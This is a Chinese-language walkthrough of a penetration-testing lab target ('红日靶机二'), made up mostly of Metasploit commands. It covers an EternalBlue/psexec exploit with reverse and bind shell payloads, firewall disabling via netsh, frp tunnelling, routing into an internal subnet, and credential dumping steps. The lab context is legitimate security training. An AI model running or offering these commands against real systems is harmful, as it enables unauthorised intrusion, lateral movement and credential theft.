红日靶机二
信息收集
失败了 换一个漏洞
木马上传
meterpreter > background
msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > set session 1
msf5 post(multi/recon/local_exploit_suggester) > run
[*] 192.168.1.128 - Collecting local exploits for java/windows...
[-] 192.168.1.128 - No suggestions available.
[*] Post module execution completed
msf5 post(multi/recon/local_exploit_suggester) >
迁移进程
自动迁移进程
run post/windows/manage/migrate
提权
设置心跳
抓取密码
进程
扫描10段端口
查看用户
域内信息
查看防火墙并关闭
shell netsh firewall show state
shell netsh advfirewall set allprofiles state off
横向移动
伪造票据
msf
修改frps.ini文件
vim frps.ini
启动frp
./frps -c frps.ini
修改frpc.ini文件
frpc.exe -c frpc.ini
添加路由
route add 10.10.10.0 255.255.255.0 1
route print
msf5 exploit(multi/handler) > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 10.10.10.10
msf5 auxiliary(scanner/smb/smb_ms17_010) > run
尝试利用
msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set lport 4440
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhost 10.10.10.10
msf5 exploit(windows/smb/ms17_010_eternalblue) > run
msf5 exploit(windows/smb/ms17_010_eternalblue) > use exploit/windows/smb/ms17_010_psexec
msf5 exploit(windows/smb/ms17_010_psexec) > set rhost 10.10.10.10
rhost => 10.10.10.10
msf5 exploit(windows/smb/ms17_010_psexec) > set rport 445
msf5 exploit(windows/smb/ms17_010_psexec) > set payload windows/x64/shell/bind_tcp
payload => windows/x64/shell/bind_tcp
msf5 exploit(windows/smb/ms17_010_psexec) > run
学习文章
https://www.jianshu.com/p/45ad9a534fb4
https://www.cnblogs.com/R1card0/articles/12960290.html
http://yugod.xmutsec.com/index.php/2020/07/15/53.html
